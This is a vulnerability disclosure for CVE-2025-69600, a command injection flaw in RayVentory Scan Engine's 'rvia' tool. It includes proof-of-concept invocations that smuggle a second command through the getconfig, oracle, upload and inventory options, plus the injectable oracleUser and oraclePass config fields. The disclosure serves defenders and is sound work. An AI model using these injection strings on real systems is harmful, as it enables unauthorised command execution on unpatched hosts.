Share
## https://sploitus.com/exploit?id=2E27957E-5926-55EC-9C16-1C8F6AC98AF7
# CVE-2025-69600

- **author:** Rafael José Núñez Gulías
- **company:** Iberian Var Group
- **Affected products:** RayVentory Scan Engine 12.6 Update 8 and previous versions
- **Raynet advisory:** [RSEC200966](https://support.raynet.de/hc/en-us/articles/46163185339284-RSEC200966-Command-Injection-via-Unsafe-System-Calls-CVE-2025-69600)

Command injection in Raynet's `rvia` allows adversaries to execute commands via `getconfig`, `upload`, `inventory`, and `oracle` options.

A validation is only performed (if configured via the configuration property `ForbiddenCurlChars` in the `/etc/rvia_configuration`) when getting the URL from the `/opt/rvia/rvia.cfg` configuration file and not when the URL is directly passed to the options `getconfig` or `upload`.

```bash
/opt/rvia/rvia getconfig \;command\;
```
![20260211165649.png](img/20260211165649.png)

Under the hood, the constructed command looks as follows:
![20260212154626.png](img/20260212154626.png)

Through the option `oracle` it is also possible to inject commands.
> This option might fail if a Java environment is not found by `rvia` (under the hood a call to the `find` command is made) and the `javaPaths` options in the `/opt/rvia/rvia.cfg` is not set

In this case, the `/opt/rvia/rvia.cfg` is defined with the option `javaPaths=/usr/lib/jvm/java-21-openjdk-amd64/`.

```bash
/opt/rvia/rvia oracle \;command\;
```

![20260211165950.png](img/20260211165950.png)

The constructed command looks like this:

![20260212152924.png](img/20260212152924.png)

The same occurs at the configuration file (`/opt/rvia/rvia.cfg`) with the options `oracleUser` and `oraclePass`.

![20251209115509.png](img/20251209115509.png)

The call under the hood is the following one:

![20260212153827.png](img/20260212153827.png)

The same applies to the `upload` option by specifying a command to execute after the URL specification. In this case a previous scaped of double quotes is needed and also a hashtag at the end of the command to ignore the following arguments.
> This option might fail if there are no inventory files at `/opt/rvia/results` (by default) directory to upload which are created by the inventory option
```bash
/opt/rvia/rvia upload \"\;command\;#
```

![20260211170615.png](img/20260211170615.png)

From `ltrace` we see the following:

![20260212154419.png](img/20260212154419.png)

Finally, the `inventory` option is also vulnerable.
```bash
/opt/rvia/rvia inventory \;command\;
```

![20260211170530.png](img/20260211170530.png)

The constructed command under the hood:

![20260212154533.png](img/20260212154533.png)